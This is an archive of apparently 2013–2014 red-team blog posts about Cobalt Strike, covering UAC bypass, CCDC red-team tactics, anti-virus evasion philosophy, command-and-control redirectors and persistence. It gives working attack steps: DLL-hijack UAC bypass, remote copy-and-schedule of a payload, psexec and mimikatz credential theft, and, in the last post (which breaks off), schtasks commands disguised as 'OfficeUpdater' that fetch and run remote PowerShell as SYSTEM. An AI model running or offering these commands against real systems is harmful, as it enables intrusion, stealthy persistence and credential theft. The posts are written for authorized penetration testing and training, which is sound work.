Archive for the ‘Red Team’ Category

User Account Control – What Penetration Testers Should Know

March 20, 2014

UAC is User Account Control. Introduced in Windows Vista, UAC is a collection of technologies that make it possible to use Windows without administrator privileges and to elevate your rights when needed. UAC has a lot of moving parts and encompasses a lot of things.

This post focuses on Windows Integrity levels and UAC elevation prompts. I will first explain some UAC concepts and then dive into three attacks to get past UAC.

Process Integrity Levels

In Windows Vista and later, processes run at three different levels of integrity: high, medium, and low. A high integrity process has administrator rights. A medium integrity process is one that runs with standard user rights. A low integrity process is very restricted.

A low integrity process cannot write to the registry and is limited from writing to most locations in the current user’s profile. Protected Mode Internet Explorer runs with low integrity. The idea is to limit the amount of damage an attacker may do if they exploit the browser.

Most desktop applications run in a medium integrity process, even if the current user is a local administrator. Use Process Explorer to see which Integrity level your programs are running at.

[Screenshot: Process Explorer showing the integrity level of running processes]

UAC Settings

To perform a privileged action, a program must run another program and request the high integrity level at that time. If the user is an administrator, what happens next will depend on their UAC settings. There are four UAC settings:

Always Notify. This setting is the highest UAC setting. It will prompt the user when any program, including a built-in Windows program, wants higher privileges.

Notify me only when programs try to make changes to my computer. This is the default UAC setting. This setting does not prompt the user when some built-in Windows programs want higher privileges. It will prompt the user when any other program wants higher privileges. This distinction is important and it plays into the UAC bypass attack that we will cover in a moment.

Notify me only when programs try to make changes to my computer (do not dim my desktop). This is the same as the default setting, except the user’s desktop does not dim when the UAC elevation prompt comes up. This setting exists for computers that lack the computing power to dim the desktop and show a dialog on top of it.

Never notify. This option takes us back to life before Windows Vista. On Windows 7, if a user is an administrator, all of their programs will run with high integrity. On Windows 8, programs run at the medium integrity level, but anything run by an Administrator that requests elevated rights gets them without a prompt.

If the user is not an administrator, they will see a prompt that asks for the username and password of a privileged user when a program tries to elevate. Microsoft calls this “over the shoulder” elevation as someone is, presumably, standing over the shoulder of the user and typing in their password. If the UAC settings are set to Never Notify, the system will automatically deny any requests to elevate.

Who Am I?

When I get a foothold from a client-side attack, I have a few questions I like to answer right away. First, I like to know which user I’m currently executing code as. Second, I like to know which rights I have. With UAC this becomes especially complicated.

One way I like to sort myself out is with the Windows command: whoami /groups.

This command will print which groups my current user belongs to.

This command will also print which integrity level my command ran with. If my command ran in a high integrity context, I will see the group Mandatory Label\High Mandatory Level. This means I have administrator rights.
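Here is an illustrative excerpt of that output from an elevated command prompt (the full group list is much longer and the columns are trimmed):

C:\>whoami /groups | findstr /i "mandatory"
Mandatory Label\High Mandatory Level    Label    S-1-16-12288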

[Screenshot: whoami /groups in a high integrity command prompt]

If my command ran in a medium integrity context, I will see the group Mandatory Label\Medium Mandatory Level. This means I have standard user rights.

[Screenshot: whoami /groups in a medium integrity command prompt]

RunAs

If I find myself in a medium integrity process run by a user in an administrators group, there is potential to elevate from standard user rights to administrator user rights. One option is to use the ShellExecute function with the runas verb. This will run a program and request elevated rights.
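A quick way to try this from PowerShell is Start-Process with the runas verb (Start-Process goes through ShellExecute under the hood):

# ask UAC to run an elevated command prompt; the user sees the consent prompt
Start-Process cmd.exe -Verb RunAs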

If UAC is set to anything other than Never Notify, the user will see a prompt that asks them if they would like to allow the action to happen. This is not completely implausible. Oracle’s Java Updater randomly prompts me all of the time.

The Metasploit Framework’s exploit/windows/local/ask module by mubix implements this attack for you. Make sure you set EXE::Custom to avoid anti-virus!

[Screenshot: UAC elevation prompt]

If the user accepts the prompt, the system will run my program in a high integrity context. Remember, medium integrity is standard user rights. High integrity is administrator rights and this is what we’re after.

Bypass UAC

The RunAs option prompts the user and that’s an opportunity to get caught. We want a way to spawn a high integrity process from a medium integrity process without a prompt. Fortunately, there is a way to do this: the bypass UAC attack.

This attack comes from Leo Davidson who made a proof-of-concept for it in 2009. David Kennedy and Kevin Mitnick popularized this attack in a 2011 DerbyCon talk. They also released the exploit/windows/local/bypassuac Metasploit Framework module that uses Leo’s proof-of-concept for the heavy lifting.

The bypass UAC attack requires that UAC is set to the default Notify me only when programs try to make changes to my computer. If UAC is set to Always Notify, this attack will not work. This attack also requires that our current user is in an administrators group.

Bypass UAC: How It Works

This is a fascinating attack whose inner workings are taken for granted. Please allow me the blog space to describe it in depth:

Our story starts with COM, the Component Object Model in Windows. COM is a way of writing components that other programs may use and re-use. One of the benefits of COM is that it’s language neutral. I find it extremely complicated and unappealing to work with. I suspect others share my feelings.

Some COM objects automatically elevate themselves to a high integrity context when run from a program signed with Microsoft’s code signing certificate. If the same COM object is instantiated from a program that was not signed by Microsoft, it runs with the same integrity as the current process.

The COM distinction between Microsoft and non-Microsoft programs has little meaning though. I can’t create a COM object in a high integrity context because my programs are not signed with Microsoft’s certificate. I can spawn a Microsoft-signed program (e.g., notepad.exe) and inject a DLL into it though. From this DLL, I may instantiate a self-elevating COM object of my choice. When this COM object performs an action, it will do so from a high integrity context.

Leo’s Bypass UAC attack creates an instance of the IFileOperation COM object. This object has methods to copy and delete files on the system. Run from a high integrity context, this object allows us to perform a privileged file copy to any location on the system.

We’re not done yet! We need to go from a privileged file copy to code execution in a high integrity process. Before we can make this leap, I need to discuss another Windows 7 fun fact.

Earlier, we went over the different UAC settings. The default UAC setting will not prompt the user when some built-in Windows programs try to elevate themselves. More practically, this means that some built-in Windows programs always run in a high integrity context.

These programs that automatically elevate have a few properties. They are signed with Microsoft’s code signing certificate. They are located in a “secure” folder (e.g., c:\windows\system32). And, they request the right to autoElevate in their manifest.

We can find which programs autoElevate themselves with a little strings magic:

cd c:\windows\
strings -s *.exe | findstr /i autoelevate

Now, we know which programs automatically run in a high integrity context AND we have the ability to perform an arbitrary copy on the file system. How do we get code execution?

We get code execution through DLL search order hijacking. The public versions of the bypass UAC attack copy a CRYPTBASE.dll file to c:\windows\system32\sysprep and run c:\windows\system32\sysprep.exe. When sysprep.exe runs it will search for CRYPTBASE.dll and find the malicious one first.
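Here is a rough sketch of the sequence (the privileged copy only succeeds because it is performed by the elevated IFileOperation object; a normal copy from a medium integrity process would be denied):

rem 1. privileged copy via the elevated IFileOperation object:
rem    malicious CRYPTBASE.dll -> c:\windows\system32\sysprep\CRYPTBASE.dll
rem 2. launch the auto-elevating program from the medium integrity process:
c:\windows\system32\sysprep\sysprep.exe
rem 3. sysprep.exe loads the planted CRYPTBASE.dll from its own folder first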

Because sysprep.exe automatically runs in a high integrity context (when UAC is set to default), the code in the attacker controlled CRYPTBASE.dll will execute in this high integrity context too. From there, we’re free to do whatever we like. We have our administrator privileges.

Holy Forensic Artifacts Batman!

I mentioned earlier that the Metasploit Framework’s bypassuac module uses Leo Davidson’s proof-of-concept. This module drops several files to disk. It uses Leo’s bypassuac-x86.exe (and bypassuac-x64.exe) to perform the privileged file copy from a medium integrity context. It also drops a CRYPTBASE.dll file and the executable we want to run to disk.

This module, when run, also creates a tior.exe and several w7e_*.tmp files in the user’s temp folder. I have no idea what the purpose of these files is.

When you use this module, you control the executable to run through the EXE::Custom option. The other artifacts are put on disk without obfuscation. For a long time, these other artifacts were caught by anti-virus products. A recent commit to the Metasploit Framework strips several debug and logging messages from these artifacts. This helps them get past the ire of anti-virus, for now.

[Screenshot: anti-virus detection of the dropped artifacts]

A better approach is to use a module that has as little on-disk footprint as possible. Fortunately, Metasploit contributor Ben Campbell (aka Meatballs) is here to save the day. A recent addition to the Metasploit Framework is the exploit/windows/local/bypassuac_inject module.  This module compiles the UAC bypass logic into a reflective DLL. It spawns a Microsoft-signed program and injects the UAC bypass logic directly into it. The only thing that needs to touch disk is the CRYPTBASE.dll file.

Bypass UAC on Windows 8.1

In this post, I’ve focused heavily on Windows 7. Leo’s proof-of-concept and the bypassuac modules in the Metasploit Framework do not work on Windows 8.1. This is because the DLL hijacking opportunity against sysprep.exe does not work in Windows 8.1. The Bypass UAC attack is still possible though.

A few releases ago, I added bypassuac to Cobalt Strike’s Beacon. I do not invest in short-term features, so I had to convince myself that this attack had a viable future. I audited all of the autoElevate programs on a stock Windows 8.1 to find another DLL hijacking opportunity. I had to find a program that would load my DLL before displaying anything to the user. There were quite a few false starts. In the end, I found my candidate.

Beacon’s Bypass UAC command is similar to Ben Campbell’s: it performs all of the UAC bypass logic in memory. Beacon’s UAC bypass also generates an anti-virus safe DLL from Cobalt Strike’s Artifact Kit. Beacon’s UAC bypass checks the system it’s running on too. If it’s Windows 7, Beacon uses sysprep.exe to get code execution in a high integrity context. If it’s Windows 8, it uses another opportunity.

If you’re having trouble with the alternatives, Beacon’s version of this attack is an option.

Bypass UAC on Windows Vista

The Bypass UAC attack does not work on Windows Vista. In Windows Vista, the user has to acknowledge every privileged action. This is the same as the Always Notify option in Windows 7 and later. The UAC settings in Windows 7 came about because UAC became a symbol of what was “wrong” with Windows Vista. Microsoft created UAC settings and made some of their built-in programs auto-elevate by default to prompt the user less often. These changes for user convenience created the loophole described in this post.

Lateral Movement and UAC

The concept of process integrity level only applies to the current system. When you interact with a network resource, your access token is all that matters. If your current user is a domain user and your domain user is a local administrator on another system, you can get past UAC. Here’s how this works:

You may use your token to interact with another system as an administrator. This means you may copy an executable to that other system and schedule it to run. If you get access to another system this way, you may repeat the same process to regain access to your current system with full rights.
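Here is a rough sketch of that copy-and-schedule step (the host and file names are placeholders; run this from your existing session as a domain user with local admin rights on the target):

copy payload.exe \\FILESRV01\C$\Windows\Temp\update.exe
schtasks /create /s FILESRV01 /tn Updater /tr C:\Windows\Temp\update.exe /sc once /st 23:59 /ru SYSTEM
schtasks /run /s FILESRV01 /tn Updater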

You may use the Metasploit Framework’s exploit/windows/local/current_user_psexec to do this.

Summary

These UAC bypass attacks are among my favorite hacker techniques. They’re a favorite because they take advantage of a design loophole rather than a fixed-with-the-next-update memory corruption flaw. In theory, we will have these attacks for a long time.

CCDC Red Teams: Ten Tips to Maximize Success

March 4, 2014

The CCDC season is upon us. This is the time of year when professionals with many years of industry experience “volunteer” to hack against college students who must defend computer networks riddled with security holes.

For the second year, my company is making Cobalt Strike available to members of the National CCDC and Regional CCDC red teams. In this post, I’d like to share a few tips for red team members who plan to use Cobalt Strike at their event.

0x01: Learn how to use Cobalt Strike

Most offensive security professionals are instantly productive with Cobalt Strike. It leverages the Metasploit Framework, which most CCDC red teamers have had some exposure to. Cobalt Strike builds on Armitage which has a positive reputation for ease of use.

These things are deceptive though. Cobalt Strike is built for power users and it has a lot of depth. To get the most from the tool, you need to spend some time learning how to use it. You could stop reading now and sum this post up as "read the manual" and "learn to use the tool" beforehand.

I publish all of my company’s training, for free, on the Cobalt Strike website. This is a great way to get a start with the tool. I will also mail a DVD with penetration testing labs to any CCDC red team member that asks for one (the announcement sent to the red teams has the link to request one).

0x02: Have a persistence strategy

Cobalt Strike does not ship with a persistence kit. Once you get on a system, you will need a strategy to fortify your access. If you do not persist, students will kick you out with the next reboot and likely, you’ll find it hard or impossible to get back in.

Good persistence is hard. It’s easy to make a mistake with a persistence mechanism. If you persist in a way that does not work, expect to spend most of your CCDC event without access.

Cobalt Strike’s scripting language, Cortana, is an opportunity to automate your persistence. This is a task that also makes sense for a local Metasploit module. Either way you go–make sure you prepare and test something before the event. Dirty Red Team Tricks I and II at DerbyCon both address past persistence strategies for CCDC.

0x03: Learn to use Beacon

Beacon is the star feature in Cobalt Strike. I built it to provide a low and slow lifeline to spawn Meterpreter sessions, as needed. It’s grown far beyond this original task. You can use Beacon to pivot into a network, to conduct post-exploitation on a host, and even as a named-pipe backdoor that you can use and re-use at will.

Spawning new sessions with Beacon is easy. Someone who has never seen Cobalt Strike or Beacon can understand how to do it after thirty seconds of training. The other use cases are power user features and require time spent with the tool and its documentation to take advantage of. Imagine sitting in front of a meterpreter> prompt for the first time. How to get the most out of the tool isn’t intuitive. It’s the same with Beacon.

0x04: Learn to Set Up Beacon Infrastructure

Beacon is a multi-protocol remote access tool. It speaks HTTP, DNS A records, DNS TXT records, and it talks over SMB named pipes. There’s a time and place for each of these features (or they wouldn’t exist). If you use Beacon to egress a compromised network, you will want to set up infrastructure to receive your connections.

Let’s start with Beacon’s HTTP mode. Sure, you can configure Beacon to call home to your IP address. A few clicks and it’s set up. If you want to make your Beacon resilient to blocks and harder to detect–you will want it to call home to multiple IP addresses. In a CCDC environment, you can bind multiple IP addresses to a system and tell Beacon to use them. If your event has internet access, you can set up “redirectors” in Amazon’s EC2 to act as a proxy between your Cobalt Strike system and your blue networks. Either way, multiple addresses are a must.
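For example, on a Linux team server you might bind a few extra addresses for Beacon to call home to (the addresses and interface below are placeholders):

ip addr add 10.10.110.21/24 dev eth0
ip addr add 10.10.110.22/24 dev eth0
ip addr add 10.10.110.23/24 dev eth0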

DNS Beacon requires some setup as well. You need to own several domains and understand DNS well enough to delegate these domains or sub-domains to your Cobalt Strike system. DNS Beacon also has its nuances. By default, it stages over HTTP, but it is also possible to stage DNS Beacon over (go figure) DNS. The Beacon lecture in the Tradecraft course dives deep into how to set this up.

DNS Beacon is amazing for long-haul low and slow command and control. It’s very survivable and few blue teams look for abuse of DNS. If you’re not using this, you’re missing out on a great tool to challenge the strongest blue teams.

0x05: Plan an opening salvo

The best time to get access at a CCDC event is in the beginning, when the systems are most vulnerable. I don’t pre-script an opening salvo anymore. I do it by hand. Here’s my process to hook all Windows systems:

I run a quick nmap scan for port 445 only. I do db_nmap -sV -O -T4 --min-hostgroup 96 -p 445 [student ranges here]. I have this command pasted into a window and I press enter the moment I hear the word go.

Once the scan completes, I highlight all hosts in the Cobalt Strike table view (Ctrl+A). If I know the default credentials, I launch psexec against all of the hosts.

If I don’t know the default credentials, I launch ms08_067_netapi. Once I get my first session, I run mimikatz to get the default credentials and I launch psexec against all of the hosts again.
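From a Meterpreter session, the credential grab looks roughly like this (the mimikatz extension ships with the Metasploit Framework):

meterpreter > load mimikatz
meterpreter > wdigest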

These steps are simple enough that I can do them by hand. Doing these steps by hand also gives me flexibility to adapt, if I quickly notice something isn’t working.

I recommend that the red team lead designate someone to go through these steps. This same person should have a script ready to install persistence on the Windows hosts that they get access to. Ideally, you should have a similar process for the *NIX side too.

0x06: Decide how you want to organize your red team

What kind of experience do you want the students to get at your CCDC event? This question will drive how you organize your red team.

Do you want the students to experience a variety of attacks against all aspects of the networks they must defend? If so, I would organize your red team by function. Have a team that’s going after websites. Have a team that’s attacking Windows systems. Have another team that’s attacking wireless stuff.

Do you want the students to gain experience hunting a well embedded adversary? I would split your red team up into cells that each focus on an individual blue team. These teams will focus on maintaining access to blue systems and, in sync with the other cells, occasionally causing something catastrophic to happen (e.g., putting customer credit card information on the company’s website).

This model works well when each red cell has the support of one global cell in charge of an opening salvo and persistence. This way all teams are compromised the same way and each cell has a fallback to regain access to a network if they need it.

This model also solves another critical issue: feedback. If two red team members focus on one blue team, they will become an expert in that team’s strengths and weaknesses. At the end of the event, you can send your red team members out to their blue team for a very educational dialog.

It’s important to have a model in mind. Without a model, the red team will devolve into organized chaos with ad-hoc cells chasing targets of opportunity rather than deliberate actions that create educational value for the students.

0x07: Build infrastructure to support your red team’s organization

Once you decide how you will organize your red team, make sure you have infrastructure set up to support it. Cobalt Strike’s team servers are a convenient way to share access to systems and networks. This isn’t the whole picture though.

Your team will need a way to exchange information in real-time. Cobalt Strike’s team server has a chatroom, but in all the events I go to, I have never seen the Cobalt Strike (or Armitage) chatroom become the primary place to exchange information. IRC and Etherpad both work well for this purpose.

When you set up Cobalt Strike’s team servers, make sure you have enough to support your model. If you choose to organize your red team into cells that each focus on a blue team, have one team server per blue team. Also, provide your global access management team with two team servers to manage persistent Beacons through.

Whatever you do, do not run all red team activity through one team server.

0x08: Have a backup plan for persistence

I mentioned earlier that you should have a persistence plan. Whatever your plan is, it probably isn’t enough. Create a backup persistence plan. It’s dangerous to rely on one tool or method to stay inside of ten very closely watched networks.

I like configuration backdoors for persistence, a lot. These backdoors work especially well if you never have to use them. If you don’t use something, a blue team doesn’t get a hint that leads them to it.

If someone on your team is familiar with another persistent agent (or they wrote one)–move them to the persistence/access management cell and have them manage it for all of the blue teams.

A persistence plan that consists of Beacon, a few choice configuration changes, and an alternate agent is very robust.

0x09: Learn to pass sessions and connect to multiple servers

Distributed Operations is one of three force multipliers for red team operations. In February 2013, Cobalt Strike gained a way to manage multiple team servers from one client. The idea is this:

One Cobalt Strike client can connect to multiple team servers. Switching between active servers is easy. When the client tries to pass a session or task a Beacon, it sees listeners from all of the servers it has a connection to.

This simple concept makes it possible for cells on a red team to overlap and work with each other. For example, let’s say my job is access management and persistence. I have low and slow Beacons for all Windows systems at my disposal. If a cell needs a session from me, I connect to their team server (or perhaps, I was already on it) and I simply task the appropriate Beacons to send a session to the listener that they setup. That’s it.

Tradecraft, lecture 9, talks about the mechanics of session passing and distributed ops in detail.

0x0A: Learn how to interoperate between Cobalt Strike and non-Cobalt Strike users

If you run a red team–I do not recommend that you force-feed one toolset to your team. If you want to do this, do it with a toolset other than mine. It’s possible to derive 95% of Cobalt Strike’s sharing and distribution benefits–even if some red teamers don’t use Cobalt Strike.

To share network footholds, become familiar with how to set up a Metasploit and Beacon SOCKS server. These SOCKS servers will allow someone else on your red team to tunnel their tools into your network. They can do it through the Proxies option in Metasploit or with the proxychains command on Linux.
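As a sketch, if the SOCKS server listens on port 1080 of a team server at 203.0.113.10 (a placeholder address), a teammate’s proxychains setup might look like this:

# /etc/proxychains.conf
[ProxyList]
socks4 203.0.113.10 1080

# then tunnel a tool through the foothold
proxychains nmap -sT -Pn -n 10.10.120.0/24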

You may also pass accesses to another Metasploit user with great ease. The way to do this is hacky, but it works. Create a dummy team server and connect to it. On this team server, create listeners with host, port, and payload values that match payload handlers that your other teammates use. The team server will start a handler for the listener you define, but, when you task it–the session will go to the teammate not using Cobalt Strike.

The Key Ingredients

Despite the joke in the opening paragraph, CCDC is hard. It’s easy to get into networks early on. It’s hard to stay in those networks and challenge the student teams throughout the event.

In this post, I brought up a number of things to consider for red team success at a CCDC event. With or without Cobalt Strike, a successful engagement requires a strategy and an active commitment to prepare for and follow through on that strategy. I hope these tips will help you prepare for your event.

Good luck!

What took so long? (A little product philosophy)

February 20, 2014

Cobalt Strike’s  January 8, 2014 release generates executables that evade many anti-virus products. This is probably one of the most requested features for Cobalt Strike.

Given the demand–why did it take so long for me to do something about it?

One-off anti-virus evasion is trivial. In 2012, I wrote a one-off stager for Windows Meterpreter. Few products caught it then. Few catch it now. Why? Because very few people use it. There’s no reason for an anti-virus vendor to write signatures against it.

When I use Cobalt Strike–I always bring a collection of private scripts to generate artifacts when I need them. I’ve never had a problem with anti-virus. Many of my users have their own process to generate artifacts. Good stuff is available publicly too. For example, Veil is a fantastic artifact generator.

If anti-virus evasion is so trivial–why didn’t I build new artifacts into Cobalt Strike until now?

Long-term Utility

Every feature I build has to have long-term utility. I want tools that will help get into networks and evade defenses five to ten years from now.

If I built short-term features, my work would hit a local optimum that I may not escape. Over time, each improvement would serve only to balance the faded utility of the old things next to it. Without maintenance, a product with short-term features would decay until it’s not useful.

Long-term focus has the opposite benefit. If I do my job right, each release is more useful to my users than any previous release. New features interact well with existing ones and all features become more useful. This sounds like common sense… but it’s not a natural course for software.

Imagine a toolset built around locating known service vulnerabilities and launching remote exploits. Seven years ago–this hypothetical toolset could rule the world. Today? This toolset’s utility would diminish with each day as it’s built for yesterday’s attack surface. Even with patchwork improvements, the best days for this kit are in the past. A few client-side attacks next to a rusty Windows 2003 rootkit creates an image of a dilapidated amusement park with one ride that still works. The world does change and sometimes these changes will obsolete what was otherwise good. At this point, it’s time to reinvent. I feel this is where we are with penetration testing tools.

Expected Life

Every time I build something–I ask, how does this give my users and me an advantage today, tomorrow, and next year? Or better put–what is the expected life of this capability?

On the offense side–a lot of our technology has a comically short expected life. Exploits are a good example of this. Once the vulnerability an exploit targets is patched–the clock starts ticking. Every day that exploit loses utility as fewer opportunities will exist to use it. I don’t build exploits and it’s not a focus of my product. A single exploit is not a long-term advantage. A team or community of exploit developers? They’re a long-term advantage. I leverage the great work in the Metasploit Framework for this. But, in terms of value add, I have to find other places to provide a long-term advantage.

What types of technologies provide a long-term advantage? Reconnaissance technologies are a long-term advantage. NMap will probably have use in the hacker’s toolbag for, at least, our lifetime. A reconnaissance tool is a life extender for your existing kit of attack options. A three-year old Internet Explorer exploit isn’t interesting—except when a reconnaissance technology helps you realize that your target is vulnerable to it. This is why I put so much effort into Cobalt Strike’s System Profiler. The System Profiler helps my users squeeze more use out of the client-side exploits in the Metasploit Framework.

Can you think of other technologies that provide a long-term advantage? Remote Administration Payloads. Meterpreter is almost ten years old. Even though it’s gained features—the Windows implementation is the same core that Skape put together a long time ago. Any effort to make post-exploitation better will pay dividends to users many years from now. So long as there’s a way to fire a payload and get it on a system–it has utility. Well, almost. There’s one pain point to this.

The Big Hunt

On the offensive side–we are in the middle of a shift. My ass was kicked by it three years ago. If you haven’t had your ass kicked by this yet–it’s coming, I promise. What’s this offensive ass kicking shift? It’s pro-active network security monitoring as a professional focus and the people who are getting good at it. Our tools are not ready for this. Our tools assume we have the freedom to get out of a network and communicate as much as we like through one channel. These assumptions hold in some cases, but they break in high security environments. What’s the next move? I’ll give you mine.

I’ve built a multi-protocol payload with ways to control its chattiness, flexibility to use redirectors, peer-to-peer communication to limit my egress points, and in a pinch–the ability to tunnel other tools through it. Why did I do this? If I can’t get out of a network with my existing tools–I’m out of the game. If I can’t maintain a stable lifeline into my target’s network–I’m out of the game. If all of my compromised systems phone home to one system–I’m easy to spot and take out of the game.

We had a free pass to use a compromised network without contest. This is coming to an end. Sophisticated attackers evolved their communication methods years ago. We need tools that provide real stealth if we’re going to continue to claim to represent a credible threat.

I work on stealth communication with Beacon, because I see a long-term benefit to this work. I see Browser Pivoting as a technique with a long-term benefit as well. Two-factor authentication hit an adoption tipping point last year and it will disrupt our favored ways to get at data and demonstrate risk. Browser Pivoting is a way to work in this new world. When I look at the offensive landscape, I see no lack of problems to solve.

Anti-virus Evasion – Revisited

What’s a problem that I didn’t touch, because of the short life expectancy of any one solution? I didn’t want to build a public artifact collection to get past anti-virus.

I remember when the US pen tester community became aware of Hyperion. Researchers from NullSecurity.net wrote a paper on a novel way to defeat any anti-virus sandbox. The technique? Encrypt a payload with a weak key and embed it into an executable with a stub of code to brute force the key. Anti-virus products would give up emulating the binary before the key was brute forced–allowing the executable to pass.

This technique is a long-term advantage. Any one of us can write our own anti-virus bypass generator that uses the Hyperion technique. So long as we keep our generator and its stub to ourselves, it will last a long time. We didn’t do this though. We took the Hyperion proof-of-concept and used it as-is without changes. What happened? Eventually anti-virus vendors wrote signatures for a stub of code in the public binary and then the technique left our minds, even though it’s still valid.

Let’s go back to the original question. Why didn’t I add anti-virus evasion artifacts until now? I didn’t work on this problem because I didn’t have a sustainable plan. I do now.

I wrote an Artifact Kit. The Artifact Kit is a simple source code framework to generate executables that smuggle payloads past anti-virus. Better, the Artifact Kit is able to build DLLs, executables, and Windows dropper executables. I expect that, in the future, the Artifact Kit will build my persistence executables as well.

I updated Cobalt Strike to use the Artifact Kit to generate executables. My psexec dialogs use it. My Windows Dropper attack uses it. I even found that the Metasploit Framework’s Firefox add-on module fired with an Artifact Kit executable becomes a nice way to get a foothold on a fully patched system. This is an example of a new feature complementing existing tools and extending their life and utility.

Artifact Kit’s techniques have a limited lifetime. The more use it gets–the more likely an analyst will spend the time to write signatures and negate the utility of the Artifact Kit. One technique isn’t sustainable. What’s the plan then?

I published the source code to Artifact Kit along with different techniques to a place my customers have access to. I also provided Cortana hooks to make Cobalt Strike use any changes that I or my customers can dream up. Now, anti-virus evasion in Cobalt Strike doesn’t hinge on one technique. It’s a strategy. As soon as one kit gets burned, swap in a new one, and magically everything in the tool that uses it will work. It took some time to think up a flexible abstraction that makes sense. I’m pretty happy with what I have now.

If you’re a developer of offensive capabilities–ask a few questions before you commit to a problem. What is the shelf-life of your solution? Is there a way to extend the life of your solution–if it runs out? And, finally, does your solution have the potential to extend the life of other capabilities? These are the questions I ask to make sure my output has the most impact possible.

Obituary: Java Self-Signed Applet (Age: 1.7u51)

January 21, 2014

The Java Signed Applet Attack is a staple social engineering option. This attack presents the user with a signed Java Applet. If the user allows this applet to run, the attacker gets access to their system. Val Smith’s 2009 Meta-Phish paper made this attack popular in the penetration testing community.

Last week’s Java 1.7 update 51 takes steps to address this vector. By default, Java will no longer run self-signed applets. This free lunch is over.

[Screenshot: Java 1.7u51 blocking a self-signed applet]

A lot of pen testers use an applet signed with a self-signed code signing certificate. For a long time–this was good enough. The old dialog to run a self-signed applet wasn’t scary. And, thanks to the prevalence of self-signed applets in legitimate applications, users were already familiar with it.

[Screenshot: the old self-signed applet prompt]

Over time, Oracle added aggressive warnings to the self-signed applet dialog. These warnings didn’t stop users from running malicious self-signed applets though.

[Screenshot: the aggressive warning for a self-signed applet]

Starting with Java 1.7u51, we should not rely on self-signed Java applets in our attacks. Going forward, we will need to sign our applet attacks with a valid code signing certificate. This isn’t a bad thing to do. Signing an applet makes the user prompt much nicer. 

[Screenshot: the prompt for an applet signed with a valid code signing certificate]

Even with a valid code signing certificate–it’s dangerous to assume a Java attack will continue to “always work” in social engineering engagements. Java is heavily abused by attackers. I expect more organizations will disable it in the browser altogether (when they can). We should update our social engineering process to stay relevant.

Here’s my recommendation:

Always profile a sample of your target’s systems before exploitation. I wrote a System Profiler to help with this. A System Profiler is a web application that maps the client-side attack surface for anyone who visits it. Reconnaissance extends the life of all attack vectors by allowing an informed decision about the best attack for a target’s environment.

If Java makes sense for a target’s profile–use it. If Java doesn’t make sense, look at social engineering attack vectors beyond Java. The Microsoft Office Macro Attack is another good option to get a foothold. In environments that do not use application whitelisting yet, a simple Windows Dropper attack will work too.

Cloud-based Redirectors for Distributed Hacking

January 14, 2014

A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and set up several systems to act as redirectors (pivot points) back to their command and control server.

[Diagram: redirectors proxying traffic back to a command and control server]

As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.

Here’s the socat command to forward connections to port 80 to 54.197.3.16:

socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80

The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directive tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.
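If you prefer iptables over socat, a rough equivalent on a Linux redirector (forwarding port 80 to the same team server) looks like this:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 54.197.3.16:80
iptables -t nat -A POSTROUTING -j MASQUERADE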

Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.

Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:

[Screenshot: the Beacon listener configuration dialog]

You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:

[Screenshot: dialog to choose which hosts Beacon calls home to]

The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.

[Screenshot: a Meterpreter listener configured with a redirector address]

Now, one Cobalt Strike instance has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convenience of managing all of this on one team server though.

If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

Schtasks Persistence with PowerShell One Liners

November 9, 2013

One of my favorite Metasploit Framework modules is psh_web_delivery. You can find it in exploits -> windows -> misc. This module starts a local web server that hosts a PowerShell script. This module also provides a PowerShell one liner to download this script and run it. I use this module all of the time in my local testing. Here’s the output of the module:

[Screenshot: output of the psh_web_delivery module]

When I provide red team support at an event, persistence is something that usually falls into my lane. Sometimes, people catch my persistence when they find an EXE or DLL artifact with a recent timestamp. Ever since I started to use psh_web_delivery in my testing, I wondered if I could also use it for persistence without dropping an artifact on disk. The answer is yes.

Here’s how to do it with schtasks:

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onlogon /ru System

#(X86) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onidle /i 30

#(X64) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onlogon /ru System

#(X64) - On System Start
